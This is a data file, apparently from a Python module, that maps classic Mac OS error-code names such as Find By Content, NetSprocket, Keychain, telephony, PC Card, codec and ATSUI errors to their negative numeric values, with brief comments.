kFBCbadSearchSession = -30531 #kFBCbadSearchSession
kFBCindexDiskIOFailed = -30530 #kFBCindexDiskIOFailed
kFBCsummarizationCanceled = -30529 #kFBCsummarizationCanceled
kFBCbadIndexFileVersion = -30528 #kFBCbadIndexFileVersion
kFBCanalysisNotAvailable = -30527 #kFBCanalysisNotAvailable
kFBCillegalSessionChange = -30526 #tried to add/remove vols to a session
kFBCsomeFilesNotIndexed = -30525 #kFBCsomeFilesNotIndexed
kFBCsearchFailed = -30524 #kFBCsearchFailed
kFBCindexNotAvailable = -30523 #kFBCindexNotAvailable
kFBCindexFileDestroyed = -30522 #kFBCindexFileDestroyed
kFBCaccessCanceled = -30521 #kFBCaccessCanceled
kFBCindexingCanceled = -30520 #kFBCindexingCanceled
kFBCnoSearchSession = -30519 #kFBCnoSearchSession
kFBCindexNotFound = -30518 #kFBCindexNotFound
kFBCflushFailed = -30517 #kFBCflushFailed
kFBCaddDocFailed = -30516 #kFBCaddDocFailed
kFBCaccessorStoreFailed = -30515 #kFBCaccessorStoreFailed
kFBCindexCreationFailed = -30514 #couldn't create index
kFBCmergingFailed = -30513 #couldn't merge index files
kFBCtokenizationFailed = -30512 #couldn't read from document or query
kFBCmoveFailed = -30511 #V-Twin exception caught
kFBCdeletionFailed = -30510 #V-Twin exception caught
kFBCcommitFailed = -30509 #V-Twin exception caught
kFBCindexingFailed = -30508 #V-Twin exception caught
kFBCvalidationFailed = -30507 #V-Twin exception caught
kFBCcompactionFailed = -30506 #V-Twin exception caught
kFBCbadIndexFile = -30505 #bad FSSpec, or bad data in file
kFBCfileNotIndexed = -30504 #kFBCfileNotIndexed
kFBCbadParam = -30503 #kFBCbadParam
kFBCallocFailed = -30502 #probably low memory
kFBCnoIndexesFound = -30501 #kFBCnoIndexesFound
kFBCvTwinExceptionErr = -30500 #no telling what it was
kDSpStereoContextErr = -30450 #kDSpStereoContextErr
kDSpInternalErr = -30449 #kDSpInternalErr
kDSpConfirmSwitchWarning = -30448 #kDSpConfirmSwitchWarning
kDSpFrameRateNotReadyErr = -30447 #kDSpFrameRateNotReadyErr
kDSpContextNotFoundErr = -30446 #kDSpContextNotFoundErr
kDSpContextNotReservedErr = -30445 #kDSpContextNotReservedErr
kDSpContextAlreadyReservedErr = -30444 #kDSpContextAlreadyReservedErr
kDSpInvalidAttributesErr = -30443 #kDSpInvalidAttributesErr
kDSpInvalidContextErr = -30442 #kDSpInvalidContextErr
kDSpSystemSWTooOldErr = -30441 #kDSpSystemSWTooOldErr
kDSpNotInitializedErr = -30440 #kDSpNotInitializedErr
kISpListBusyErr = -30429 #kISpListBusyErr
kISpDeviceActiveErr = -30428 #kISpDeviceActiveErr
kISpSystemActiveErr = -30427 #kISpSystemActiveErr
kISpDeviceInactiveErr = -30426 #kISpDeviceInactiveErr
kISpSystemInactiveErr = -30425 #kISpSystemInactiveErr
kISpElementNotInListErr = -30424 #kISpElementNotInListErr
kISpElementInListErr = -30423 #kISpElementInListErr
kISpBufferToSmallErr = -30422 #kISpBufferToSmallErr
kISpSystemListErr = -30421 #kISpSystemListErr
kISpInternalErr = -30420 #kISpInternalErr
kNSpJoinFailedErr = -30399 #kNSpJoinFailedErr
kNSpCantBlockErr = -30398 #kNSpCantBlockErr
kNSpMessageTooBigErr = -30397 #kNSpMessageTooBigErr
kNSpSendFailedErr = -30396 #kNSpSendFailedErr
kNSpConnectFailedErr = -30395 #kNSpConnectFailedErr
kNSpGameTerminatedErr = -30394 #kNSpGameTerminatedErr
kNSpTimeoutErr = -30393 #kNSpTimeoutErr
kNSpInvalidProtocolListErr = -30392 #kNSpInvalidProtocolListErr
kNSpInvalidProtocolRefErr = -30391 #kNSpInvalidProtocolRefErr
kNSpInvalidDefinitionErr = -30390 #kNSpInvalidDefinitionErr
kNSpAddPlayerFailedErr = -30389 #kNSpAddPlayerFailedErr
kNSpCreateGroupFailedErr = -30388 #kNSpCreateGroupFailedErr
kNSpNoHostVolunteersErr = -30387 #kNSpNoHostVolunteersErr
kNSpNoGroupsErr = -30386 #kNSpNoGroupsErr
kNSpNoPlayersErr = -30385 #kNSpNoPlayersErr
kNSpInvalidGroupIDErr = -30384 #kNSpInvalidGroupIDErr
kNSpInvalidPlayerIDErr = -30383 #kNSpInvalidPlayerIDErr
kNSpNameRequiredErr = -30382 #kNSpNameRequiredErr
kNSpFeatureNotImplementedErr = -30381 #kNSpFeatureNotImplementedErr
kNSpAddressInUseErr = -30380 #kNSpAddressInUseErr
kNSpRemovePlayerFailedErr = -30379 #kNSpRemovePlayerFailedErr
kNSpFreeQExhaustedErr = -30378 #kNSpFreeQExhaustedErr
kNSpInvalidAddressErr = -30377 #kNSpInvalidAddressErr
kNSpNotAdvertisingErr = -30376 #kNSpNotAdvertisingErr
kNSpAlreadyAdvertisingErr = -30374 #kNSpAlreadyAdvertisingErr
kNSpMemAllocationErr = -30373 #kNSpMemAllocationErr
kNSpOTVersionTooOldErr = -30371 #kNSpOTVersionTooOldErr
kNSpOTNotPresentErr = -30370 #kNSpOTNotPresentErr
kNSpInvalidParameterErr = -30369 #kNSpInvalidParameterErr
kNSpInvalidGameRefErr = -30367 #kNSpInvalidGameRefErr
kNSpProtocolNotAvailableErr = -30366 #kNSpProtocolNotAvailableErr
kNSpHostFailedErr = -30365 #kNSpHostFailedErr
kNSpPipeFullErr = -30364 #kNSpPipeFullErr
kNSpTopologyNotSupportedErr = -30362 #kNSpTopologyNotSupportedErr
kNSpAlreadyInitializedErr = -30361 #kNSpAlreadyInitializedErr
kNSpInitializationFailedErr = -30360 #kNSpInitializationFailedErr
kSSpScaleToZeroErr = -30344 #kSSpScaleToZeroErr
kSSpParallelUpVectorErr = -30343 #kSSpParallelUpVectorErr
kSSpCantInstallErr = -30342 #kSSpCantInstallErr
kSSpVersionErr = -30341 #kSSpVersionErr
kSSpInternalErr = -30340 #kSSpInternalErr
kALMInternalErr = -30049 #kALMInternalErr
kALMGroupNotFoundErr = -30048 #kALMGroupNotFoundErr
kALMNoSuchModuleErr = -30047 #kALMNoSuchModuleErr
kALMModuleCommunicationErr = -30046 #kALMModuleCommunicationErr
kALMDuplicateModuleErr = -30045 #kALMDuplicateModuleErr
kALMInstallationErr = -30044 #kALMInstallationErr
kALMDeferSwitchErr = -30043 #kALMDeferSwitchErr
kALMRebootFlagsLevelErr = -30042 #kALMRebootFlagsLevelErr
kLocalesDefaultDisplayStatus = -30029 #Requested display locale unavailable, used default
kLocalesTableFormatErr = -30002 #kLocalesTableFormatErr
kLocalesBufferTooSmallErr = -30001 #kLocalesBufferTooSmallErr
kFNSNameNotFoundErr = -29589 #The name with the requested paramters was not found
kFNSBadFlattenedSizeErr = -29587 #flattened size didn't match input or was too small
kFNSInsufficientDataErr = -29586 #insufficient data for the operation
kFNSMismatchErr = -29585 #reference didn't match or wasn't found in profile
kFNSDuplicateReferenceErr = -29584 #the ref. being added is already in the profile
kFNSBadProfileVersionErr = -29583 #profile version is out of known range
kFNSInvalidProfileErr = -29582 #profile is NULL or otherwise bad
kFNSBadReferenceVersionErr = -29581 #ref. version is out of known range
kFNSInvalidReferenceErr = -29580 #ref. was NULL or otherwise bad
kCollateInvalidCollationRef = -29507 #kCollateInvalidCollationRef
kCollateBufferTooSmall = -29506 #kCollateBufferTooSmall
kCollateInvalidChar = -29505 #kCollateInvalidChar
kCollatePatternNotFoundErr = -29504 #kCollatePatternNotFoundErr
kCollateUnicodeConvertFailedErr = -29503 #kCollateUnicodeConvertFailedErr
kCollateMissingUnicodeTableErr = -29502 #kCollateMissingUnicodeTableErr
kCollateInvalidOptions = -29501 #kCollateInvalidOptions
kCollateAttributesNotFoundErr = -29500 #kCollateAttributesNotFoundErr
kMPInvalidIDErr = -29299 #kMPInvalidIDErr
kMPInsufficientResourcesErr = -29298 #kMPInsufficientResourcesErr
kMPTaskAbortedErr = -29297 #kMPTaskAbortedErr
kMPTimeoutErr = -29296 #kMPTimeoutErr
kMPDeletedErr = -29295 #kMPDeletedErr
kMPBlueBlockingErr = -29293 #kMPBlueBlockingErr
kMPTaskStoppedErr = -29292 #A convention used with MPThrowException.
kMPTaskBlockedErr = -29291 #kMPTaskBlockedErr
kMPTaskCreatedErr = -29290 #kMPTaskCreatedErr
kMPProcessTerminatedErr = -29289 #kMPProcessTerminatedErr
kMPProcessCreatedErr = -29288 #kMPProcessCreatedErr
kMPPrivilegedErr = -29276 #kMPPrivilegedErr
kMPIterationEndErr = -29275 #kMPIterationEndErr
kUCTextBreakLocatorMissingType = -25341 #Unicode text break error
kUCOutputBufferTooSmall = -25340 #Output buffer too small for Unicode string result
errKCCreateChainFailed = -25318 #errKCCreateChainFailed
errKCDataNotModifiable = -25317 #errKCDataNotModifiable
errKCDataNotAvailable = -25316 #errKCDataNotAvailable
errKCInteractionRequired = -25315 #errKCInteractionRequired
errKCNoPolicyModule = -25314 #errKCNoPolicyModule
errKCNoCertificateModule = -25313 #errKCNoCertificateModule
errKCNoStorageModule = -25312 #errKCNoStorageModule
errKCKeySizeNotAllowed = -25311 #errKCKeySizeNotAllowed
errKCWrongKCVersion = -25310 #errKCWrongKCVersion
errKCReadOnlyAttr = -25309 #errKCReadOnlyAttr
errKCInteractionNotAllowed = -25308 #errKCInteractionNotAllowed
errKCNoDefaultKeychain = -25307 #errKCNoDefaultKeychain
errKCNoSuchClass = -25306 #errKCNoSuchClass
errKCInvalidSearchRef = -25305 #errKCInvalidSearchRef
errKCInvalidItemRef = -25304 #errKCInvalidItemRef
errKCNoSuchAttr = -25303 #errKCNoSuchAttr
errKCDataTooLarge = -25302 #errKCDataTooLarge
errKCBufferTooSmall = -25301 #errKCBufferTooSmall
errKCItemNotFound = -25300 #errKCItemNotFound
errKCDuplicateItem = -25299 #errKCDuplicateItem
errKCInvalidCallback = -25298 #errKCInvalidCallback
errKCDuplicateCallback = -25297 #errKCDuplicateCallback
errKCDuplicateKeychain = -25296 #errKCDuplicateKeychain
errKCInvalidKeychain = -25295 #errKCInvalidKeychain
errKCNoSuchKeychain = -25294 #errKCNoSuchKeychain
errKCAuthFailed = -25293 #errKCAuthFailed
errKCReadOnly = -25292 #errKCReadOnly
errKCNotAvailable = -25291 #errKCNotAvailable
printerStatusOpCodeNotSupportedErr = -25280 #printerStatusOpCodeNotSupportedErr
kTXNOutsideOfFrameErr = -22018 #kTXNOutsideOfFrameErr
kTXNOutsideOfLineErr = -22017 #kTXNOutsideOfLineErr
kTXNATSUIIsNotInstalledErr = -22016 #kTXNATSUIIsNotInstalledErr
kTXNDataTypeNotAllowedErr = -22015 #kTXNDataTypeNotAllowedErr
kTXNCopyNotAllowedInEchoModeErr = -22014 #kTXNCopyNotAllowedInEchoModeErr
kTXNCannotTurnTSMOffWhenUsingUnicodeErr = -22013 #kTXNCannotTurnTSMOffWhenUsingUnicodeErr
kTXNAlreadyInitializedErr = -22012 #kTXNAlreadyInitializedErr
kTXNInvalidRunIndex = -22011 #kTXNInvalidRunIndex
kTXNSomeOrAllTagsInvalidForRunErr = -22010 #kTXNSomeOrAllTagsInvalidForRunErr
kTXNAttributeTagInvalidForRunErr = -22009 #dataValue is set to this per invalid tag
kTXNNoMatchErr = -22008 #kTXNNoMatchErr
kTXNRunIndexOutofBoundsErr = -22007 #kTXNRunIndexOutofBoundsErr
kTXNCannotSetAutoIndentErr = -22006 #kTXNCannotSetAutoIndentErr
kTXNBadDefaultFileTypeWarning = -22005 #kTXNBadDefaultFileTypeWarning
kTXNUserCanceledOperationErr = -22004 #kTXNUserCanceledOperationErr
kTXNIllegalToCrossDataBoundariesErr = -22003 #kTXNIllegalToCrossDataBoundariesErr
kTXNInvalidFrameIDErr = -22002 #kTXNInvalidFrameIDErr
kTXNCannotAddFrameErr = -22001 #kTXNCannotAddFrameErr
kTXNEndIterationErr = -22000 #kTXNEndIterationErr
invalidIndexErr = -20002 #The recordIndex parameter is not valid.
recordDataTooBigErr = -20001 #The record data is bigger than buffer size (1024 bytes).
unknownInsertModeErr = -20000 #There is no such an insert mode.
kModemScriptMissing = -14002 #kModemScriptMissing
kModemPreferencesMissing = -14001 #kModemPreferencesMissing
kModemOutOfMemory = -14000 #kModemOutOfMemory
kHIDBaseError = -13950 #kHIDBaseError
kHIDNullStateErr = -13949 #kHIDNullStateErr
kHIDBufferTooSmallErr = -13948 #kHIDBufferTooSmallErr
kHIDValueOutOfRangeErr = -13947 #kHIDValueOutOfRangeErr
kHIDUsageNotFoundErr = -13946 #kHIDUsageNotFoundErr
kHIDNotValueArrayErr = -13945 #kHIDNotValueArrayErr
kHIDInvalidPreparsedDataErr = -13944 #kHIDInvalidPreparsedDataErr
kHIDIncompatibleReportErr = -13943 #kHIDIncompatibleReportErr
kHIDBadLogPhysValuesErr = -13942 #kHIDBadLogPhysValuesErr
kHIDInvalidReportTypeErr = -13941 #kHIDInvalidReportTypeErr
kHIDInvalidReportLengthErr = -13940 #kHIDInvalidReportLengthErr
kHIDNullPointerErr = -13939 #kHIDNullPointerErr
kHIDBadParameterErr = -13938 #kHIDBadParameterErr
kHIDNotEnoughMemoryErr = -13937 #kHIDNotEnoughMemoryErr
kHIDEndOfDescriptorErr = -13936 #kHIDEndOfDescriptorErr
kHIDUsagePageZeroErr = -13935 #kHIDUsagePageZeroErr
kHIDBadLogicalMinimumErr = -13934 #kHIDBadLogicalMinimumErr
kHIDBadLogicalMaximumErr = -13933 #kHIDBadLogicalMaximumErr
kHIDInvertedLogicalRangeErr = -13932 #kHIDInvertedLogicalRangeErr
kHIDInvertedPhysicalRangeErr = -13931 #kHIDInvertedPhysicalRangeErr
kHIDUnmatchedUsageRangeErr = -13930 #kHIDUnmatchedUsageRangeErr
kHIDInvertedUsageRangeErr = -13929 #kHIDInvertedUsageRangeErr
kHIDUnmatchedStringRangeErr = -13928 #kHIDUnmatchedStringRangeErr
kHIDUnmatchedDesignatorRangeErr = -13927 #kHIDUnmatchedDesignatorRangeErr
kHIDReportSizeZeroErr = -13926 #kHIDReportSizeZeroErr
kHIDReportCountZeroErr = -13925 #kHIDReportCountZeroErr
kHIDReportIDZeroErr = -13924 #kHIDReportIDZeroErr
kHIDInvalidRangePageErr = -13923 #kHIDInvalidRangePageErr
kHIDDeviceNotReady = -13910 #The device is still initializing, try again later
kHIDVersionIncompatibleErr = -13909 #kHIDVersionIncompatibleErr
debuggingNoMatchErr = -13887 #debugging component or option not found at this index
debuggingNoCallbackErr = -13886 #debugging component has no callback
debuggingInvalidNameErr = -13885 #componentName or optionName is invalid (NULL)
debuggingInvalidOptionErr = -13884 #optionSelectorNum is not registered
debuggingInvalidSignatureErr = -13883 #componentSignature not registered
debuggingDuplicateOptionErr = -13882 #optionSelectorNum already registered
debuggingDuplicateSignatureErr = -13881 #componentSignature already registered
debuggingExecutionContextErr = -13880 #routine cannot be called at this time
kBridgeSoftwareRunningCantSleep = -13038 #kBridgeSoftwareRunningCantSleep
kNoSuchPowerSource = -13020 #kNoSuchPowerSource
kProcessorTempRoutineRequiresMPLib2 = -13014 #kProcessorTempRoutineRequiresMPLib2
kCantReportProcessorTemperatureErr = -13013 #kCantReportProcessorTemperatureErr
kPowerMgtRequestDenied = -13010 #kPowerMgtRequestDenied
kPowerMgtMessageNotHandled = -13009 #kPowerMgtMessageNotHandled
kPowerHandlerNotFoundForProcErr = -13008 #kPowerHandlerNotFoundForProcErr
kPowerHandlerNotFoundForDeviceErr = -13007 #kPowerHandlerNotFoundForDeviceErr
kPowerHandlerExistsForDeviceErr = -13006 #kPowerHandlerExistsForDeviceErr
pmRecvEndErr = -13005 #during receive, pmgr did not finish hs configured for this connection
pmRecvStartErr = -13004 #during receive, pmgr did not start hs
pmSendEndErr = -13003 #during send, pmgr did not finish hs
pmSendStartErr = -13002 #during send, pmgr did not start hs
pmReplyTOErr = -13001 #Timed out waiting for reply
pmBusyErr = -13000 #Power Mgr never ready to start handshake
pictureDataErr = -11005 #the picture data was invalid
colorsRequestedErr = -11004 #the number of colors requested was illegal
cantLoadPickMethodErr = -11003 #unable to load the custom pick proc
pictInfoVerbErr = -11002 #the passed verb was invalid
pictInfoIDErr = -11001 #the internal consistancy check for the PictInfoID is wrong
pictInfoVersionErr = -11000 #wrong version of the PictInfo structure
errTaskNotFound = -10780 #no task with that task id exists
telNotEnoughdspBW = -10116 #not enough real-time for allocation
telBadSampleRate = -10115 #incompatible sample rate
telBadSWErr = -10114 #Software not installed properly
telDetAlreadyOn = -10113 #detection is already turned on
telAutoAnsNotOn = -10112 #autoAnswer in not turned on
telValidateFailed = -10111 #telValidate failed
telBadProcID = -10110 #invalid procID
telDeviceNotFound = -10109 #device not found
telBadCodeResource = -10108 #code resource not found
telInitFailed = -10107 #initialization failed
telNoCommFolder = -10106 #Communications/Extensions not found
telUnknownErr = -10103 #unable to set config
telNoSuchTool = -10102 #unable to find tool with name specified
telBadFunction = -10091 #bad msgCode specified
telPBErr = -10090 #parameter block error, bad format
telCANotDeflectable = -10082 #CA not "deflectable"
telCANotRejectable = -10081 #CA not "rejectable"
telCANotAcceptable = -10080 #CA not "acceptable"
telTermNotOpen = -10072 #terminal not opened via TELOpenTerm
telStillNeeded = -10071 #terminal driver still needed by someone else
telAlreadyOpen = -10070 #terminal already open
telNoCallbackRef = -10064 #no call back reference was specified, but is required
telDisplayModeNotSupp = -10063 #display mode not supported by tool
telBadDisplayMode = -10062 #bad display mode specified
telFwdTypeNotSupp = -10061 #forward type not supported by tool
telDNTypeNotSupp = -10060 #DN type not supported by tool
telBadRate = -10059 #bad rate specified
telBadBearerType = -10058 #bad bearerType specified
telBadSelect = -10057 #unable to select or deselect DN
telBadParkID = -10056 #bad park id specified
telBadPickupGroupID = -10055 #bad pickup group ID specified
telBadFwdType = -10054 #bad fwdType specified
telBadFeatureID = -10053 #bad feature ID specified
telBadIntercomID = -10052 #bad intercom ID specified
telBadPageID = -10051 #bad page ID specified
telBadDNType = -10050 #DN type invalid
telConfLimitExceeded = -10047 #attempt to exceed switch conference limits
telCBErr = -10046 #call back feature not set previously
telTransferRej = -10045 #transfer request rejected
telTransferErr = -10044 #transfer not prepared
telConfRej = -10043 #conference request was rejected
telConfErr = -10042 #conference was not prepared
telConfNoLimit = -10041 #no limit was specified but required
telConfLimitErr = -10040 #limit specified is too high for this configuration
telFeatNotSupp = -10033 #feature program call not supported by this tool
telFeatActive = -10032 #feature already active
telFeatNotAvail = -10031 #feature subscribed but not available
telFeatNotSub = -10030 #feature not subscribed
errAEPropertiesClash = -10025 #illegal combination of properties settings for Set Data, make new, or duplicate
errAECantPutThatThere = -10024 #in make new, duplicate, etc. class can't be an element of container
errAENotAnEnumMember = -10023 #enumerated value in SetData is not allowed for this property
telIntExtNotSupp = -10022 #internal external type not supported by this tool
telBadIntExt = -10021 #bad internal external error
telStateNotSupp = -10020 #device state not supported by tool
telBadStateErr = -10019 #bad device state specified
telIndexNotSupp = -10018 #index not supported by this tool
telBadIndex = -10017 #bad index specified
telAPattNotSupp = -10016 #alerting pattern not supported by tool
telBadAPattErr = -10015 #bad alerting pattern specified
telVTypeNotSupp = -10014 #volume type not supported by this tool
telBadVTypeErr = -10013 #bad volume type error
telBadLevelErr = -10012 #bad volume level setting
telHTypeNotSupp = -10011 #hook type not supported by this tool
telBadHTypeErr = -10010 #bad hook type specified
errAECantSupplyType = -10009 #errAECantSupplyType
telNoOpenErr = -10008 #unable to open terminal
telNoMemErr = -10007 #no memory to allocate handle
errOSACantAssign = -10006 #Signaled when an object cannot be set in a container.
telBadProcErr = -10005 #bad msgProc specified
telBadHandErr = -10004 #bad handle specified
OSAIllegalAssign = -10003 #Signaled when an object can never be set in a container
telBadDNErr = -10002 #TELDNHandle not found or invalid
telBadTermErr = -10001 #invalid TELHandle or handle not found
errAEEventFailed = -10000 #errAEEventFailed
cannotMoveAttachedController = -9999 #cannotMoveAttachedController
controllerHasFixedHeight = -9998 #controllerHasFixedHeight
cannotSetWidthOfAttachedController = -9997 #cannotSetWidthOfAttachedController
controllerBoundsNotExact = -9996 #controllerBoundsNotExact
editingNotAllowed = -9995 #editingNotAllowed
badControllerHeight = -9994 #badControllerHeight
deviceCantMeetRequest = -9408 #deviceCantMeetRequest
seqGrabInfoNotAvailable = -9407 #seqGrabInfoNotAvailable
badSGChannel = -9406 #badSGChannel
couldntGetRequiredComponent = -9405 #couldntGetRequiredComponent
notEnoughDiskSpaceToGrab = -9404 #notEnoughDiskSpaceToGrab
notEnoughMemoryToGrab = -9403 #notEnoughMemoryToGrab
cantDoThatInCurrentMode = -9402 #cantDoThatInCurrentMode
grabTimeComplete = -9401 #grabTimeComplete
noDeviceForChannel = -9400 #noDeviceForChannel
kNoCardBusCISErr = -9109 #No valid CIS exists for this CardBus card
kNotZVCapableErr = -9108 #This socket does not support Zoomed Video
kCardPowerOffErr = -9107 #Power to the card has been turned off
kAttemptDupCardEntryErr = -9106 #The Enabler was asked to create a duplicate card entry
kAlreadySavedStateErr = -9105 #The state has been saved on previous call
kTooManyIOWindowsErr = -9104 #device requested more than one I/O window
kNotReadyErr = -9103 #PC Card failed to go ready
kClientRequestDenied = -9102 #CS Clients should return this code inorder to
kNoCompatibleNameErr = -9101 #There is no compatible driver name for this device
kNoEnablerForCardErr = -9100 #No Enablers were found that can support the card
kNoCardEnablersFoundErr = -9099 #No Enablers were found
kUnsupportedCardErr = -9098 #Card not supported by generic enabler
kNoClientTableErr = -9097 #The client table has not be initialized yet
kNoMoreInterruptSlotsErr = -9096 #All internal Interrupt slots are in use
kNoMoreTimerClientsErr = -9095 #All timer callbacks are in use
kNoIOWindowRequestedErr = -9094 #Request I/O window before calling configuration
kBadCustomIFIDErr = -9093 #Custom interface ID is invalid
kBadTupleDataErr = -9092 #Data in tuple is invalid
kInvalidCSClientErr = -9091 #Card Services ClientID is not registered
kUnsupportedVsErr = -9090 #Unsupported Voltage Sense
kInvalidDeviceNumber = -9089 #kInvalidDeviceNumber
kPostCardEventErr = -9088 #_PCCSLPostCardEvent failed and dropped an event
kCantConfigureCardErr = -9087 #kCantConfigureCardErr
kPassCallToChainErr = -9086 #kPassCallToChainErr
kCardBusCardErr = -9085 #kCardBusCardErr
k16BitCardErr = -9084 #k16BitCardErr
kBadDeviceErr = -9083 #kBadDeviceErr
kBadLinkErr = -9082 #kBadLinkErr
kInvalidRegEntryErr = -9081 #kInvalidRegEntryErr
kNoCardSevicesSocketsErr = -9080 #kNoCardSevicesSocketsErr
kOutOfResourceErr = -9079 #Card Services has exhausted the resource
kNoMoreItemsErr = -9078 #there are no more of the requested item
kInUseErr = -9077 #requested resource is being used by a client
kConfigurationLockedErr = -9076 #a configuration has already been locked
kWriteProtectedErr = -9075 #media is write-protected
kBusyErr = -9074 #unable to process request at this time - try later
kUnsupportedModeErr = -9073 #mode is not supported
kUnsupportedFunctionErr = -9072 #function is not supported by this implementation
kNoCardErr = -9071 #no PC card in the socket
kGeneralFailureErr = -9070 #an undefined error has occurred
kWriteFailureErr = -9069 #unable to complete write request
kReadFailureErr = -9068 #unable to complete read request
kBadSpeedErr = -9067 #specified speed is unavailable
kBadCISErr = -9066 #CIS on card is invalid
kBadHandleErr = -9065 #clientHandle is invalid
kBadArgsErr = -9064 #values in argument packet are invalid
kBadArgLengthErr = -9063 #ArgLength argument is invalid
kBadWindowErr = -9062 #specified window is invalid
kBadVppErr = -9061 #specified Vpp1 or Vpp2 power level index is invalid
kBadVccErr = -9060 #specified Vcc power level index is invalid
kBadTypeErr = -9059 #specified window or interface type is invalid
kBadSocketErr = -9058 #specified logical or physical socket number is invalid
kBadSizeErr = -9057 #specified size is invalid
kBadPageErr = -9056 #specified page is invalid
kBadOffsetErr = -9055 #specified PC card memory array offset is invalid
kBadIRQErr = -9054 #specified IRQ level is invalid
kBadEDCErr = -9053 #specified EDC generator specified is invalid
kBadBaseErr = -9052 #specified base system memory address is invalid
kBadAttributeErr = -9051 #specified attributes field value is invalid
kBadAdapterErr = -9050 #invalid adapter number
codecOffscreenFailedPleaseRetryErr = -8992 #codecOffscreenFailedPleaseRetryErr
lockPortBitsWrongGDeviceErr = -8991 #lockPortBitsWrongGDeviceErr
directXObjectAlreadyExists = -8990 #directXObjectAlreadyExists
codecDroppedFrameErr = -8989 #returned from ImageCodecDrawBand
codecOffscreenFailedErr = -8988 #codecOffscreenFailedErr
codecNeedAccessKeyErr = -8987 #codec needs password in order to decompress
codecParameterDialogConfirm = -8986 #codecParameterDialogConfirm
lockPortBitsSurfaceLostErr = -8985 #lockPortBitsSurfaceLostErr
lockPortBitsBadPortErr = -8984 #lockPortBitsBadPortErr
lockPortBitsWindowClippedErr = -8983 #lockPortBitsWindowClippedErr
lockPortBitsWindowResizedErr = -8982 #lockPortBitsWindowResizedErr
lockPortBitsWindowMovedErr = -8981 #lockPortBitsWindowMovedErr
lockPortBitsBadSurfaceErr = -8980 #lockPortBitsBadSurfaceErr
codecNeedToFlushChainErr = -8979 #codecNeedToFlushChainErr
codecDisabledErr = -8978 #codec disabled itself -- pass codecFlagReenable to reset
codecNoMemoryPleaseWaitErr = -8977 #codecNoMemoryPleaseWaitErr
codecNothingToBlitErr = -8976 #codecNothingToBlitErr
codecCantQueueErr = -8975 #codecCantQueueErr
codecCantWhenErr = -8974 #codecCantWhenErr
codecOpenErr = -8973 #codecOpenErr
codecConditionErr = -8972 #codecConditionErr
codecExtensionNotFoundErr = -8971 #codecExtensionNotFoundErr
codecDataVersErr = -8970 #codecDataVersErr
codecBadDataErr = -8969 #codecBadDataErr
codecWouldOffscreenErr = -8968 #codecWouldOffscreenErr
codecAbortErr = -8967 #codecAbortErr
codecSpoolErr = -8966 #codecSpoolErr
codecImageBufErr = -8965 #codecImageBufErr
codecScreenBufErr = -8964 #codecScreenBufErr
codecSizeErr = -8963 #codecSizeErr
codecUnimpErr = -8962 #codecUnimpErr
noCodecErr = -8961 #noCodecErr
codecErr = -8960 #codecErr
kIllegalClockValueErr = -8852 #kIllegalClockValueErr
kUTCOverflowErr = -8851 #kUTCOverflowErr
kUTCUnderflowErr = -8850 #kUTCUnderflowErr
kATSULastErr = -8809 #The last ATSUI error code.
kATSULineBreakInWord = -8808 #This is not an error code but is returned by ATSUBreakLine to
kATSUCoordinateOverflowErr = -8807 #Used to indicate the coordinates provided to an ATSUI routine caused
kATSUNoFontScalerAvailableErr = -8806 #Used when no font scaler is available for the font passed
kATSUNoFontCmapAvailableErr = -8805 #Used when no CMAP table can be accessed or synthesized for the
kATSULowLevelErr = -8804 #Used when an error was encountered within the low level ATS
kATSUQuickDrawTextErr = -8803 #Used when QuickDraw Text encounters an error rendering or measuring
kATSUNoStyleRunsAssignedErr = -8802 #Used when an attempt was made to measure, highlight or draw
kATSUNotSetErr = -8801 #Used when the client attempts to retrieve an attribute,
kATSUInvalidCacheErr = -8800 #Used when an attempt was made to read in style data
kATSUInvalidAttributeTagErr = -8799 #Used when an attempt was made to use a tag value that
kATSUInvalidAttributeSizeErr = -8798 #Used when an attempt was made to use an attribute with a
kATSUInvalidAttributeValueErr = -8797 #Used when an attempt was made to use an attribute with
kATSUInvalidFontErr = -8796 #Used when an attempt was made to use an invalid font ID.
kATSUNoCorrespondingFontErr = -8795 #This value is retrned by font ID conversion
kATSUFontsNotMatched = -8794 #This value is returned by ATSUMatchFontsToText()
kATSUFontsMatched = -8793 #This is not an error code but is returned by
kATSUInvalidTextRangeErr = -8792 #An attempt was made to extract information
kATSUInvalidStyleErr = -8791 #An attempt was made to use a ATSUStyle which
kATSUInvalidTextLayoutErr = -8790 #An attempt was made to use a ATSUTextLayout
kTECOutputBufferFullStatus = -8785 #output buffer has no room for conversion of next input text element (partial conversion)
kTECNeedFlushStatus = -8784 #kTECNeedFlushStatus
kTECUsedFallbacksStatus = -8783 #kTECUsedFallbacksStatus
kTECItemUnavailableErr = -8771 #item (e.g. name) not available for specified region (& encoding if relevant)
kTECGlobalsUnavailableErr = -8770 #globals have already been deallocated (premature TERM)
unicodeChecksumErr = -8769 #unicodeChecksumErr
unicodeNoTableErr = -8768 #unicodeNoTableErr
unicodeVariantErr = -8767 #unicodeVariantErr
unicodeFallbacksErr = -8766 #unicodeFallbacksErr
unicodePartConvertErr = -8765 #unicodePartConvertErr
unicodeBufErr = -8764 #unicodeBufErr
unicodeCharErr = -8763 #unicodeCharErr
unicodeElementErr = -8762 #unicodeElementErr
unicodeNotFoundErr = -8761 #unicodeNotFoundErr
unicodeTableFormatErr = -8760 #unicodeTableFormatErr
unicodeDirectionErr = -8759 #unicodeDirectionErr
unicodeContextualErr = -8758 #unicodeContextualErr
unicodeTextEncodingDataErr = -8757 #unicodeTextEncodingDataErr
kTECDirectionErr = -8756 #direction stack overflow, etc.
kTECIncompleteElementErr = -8755 #text element may be incomplete or is too long for internal buffers
kTECUnmappableElementErr = -8754 #kTECUnmappableElementErr
kTECPartialCharErr = -8753 #input buffer ends in the middle of a multibyte character, conversion stopped
kTECBadTextRunErr = -8752 #kTECBadTextRunErr
kTECArrayFullErr = -8751 #supplied name buffer or TextRun, TextEncoding, or UnicodeMapping array is too small
kTECBufferBelowMinimumSizeErr = -8750 #output buffer too small to allow processing of first input text element
kTECNoConversionPathErr = -8749 #kTECNoConversionPathErr
kTECCorruptConverterErr = -8748 #invalid converter object reference
kTECTableFormatErr = -8747 #kTECTableFormatErr
kTECTableChecksumErr = -8746 #kTECTableChecksumErr
kTECMissingTableErr = -8745 #kTECMissingTableErr
kTextUndefinedElementErr = -8740 #text conversion errors
kTextMalformedInputErr = -8739 #in DBCS, for example, high byte followed by invalid low byte
kTextUnsupportedEncodingErr = -8738 #specified encoding not supported for this operation
kRANotEnabled = -7139 #kRANotEnabled
kRACallBackFailed = -7138 #kRACallBackFailed
kRADuplicateIPAddr = -7137 #kRADuplicateIPAddr
